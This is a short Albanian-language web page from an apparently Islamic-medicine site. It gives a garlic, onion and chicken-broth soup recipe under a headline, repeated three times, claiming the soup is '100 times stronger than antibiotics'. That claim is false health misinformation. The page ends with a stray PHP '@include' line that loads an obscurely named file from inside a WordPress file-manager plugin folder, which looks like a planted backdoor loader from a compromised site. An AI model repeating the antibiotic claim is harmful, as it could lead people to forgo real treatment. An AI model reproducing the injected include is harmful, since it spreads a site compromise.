Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Supa me hudhra, 100 here me e forte se antibiotiket

Supa me hudhra, 100 here me e forte se antibiotiket

Supa me hudhra, 100 here me e forte se antibiotiket.
5 kokrra te plota hudhre
2 luge gjelle vaj ulliri
2 luge gjalp(jo margarine)
1 qepe te kuqe
6 gota me supe pule (300 ml)
3 gota me buke te thekur te grimcuar
ereza sipas deshires.
Qerohen hudhrat, priten ne njesi te vogla, perzihen me ereza, skuqen ne vaj ulliri, shtohet qepa e kuqe, gjalpi, pastaj shtohet supa e pules, buka e grimcuar dhe ereza. Lihet per 15 minuta dhe shijojeni.

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";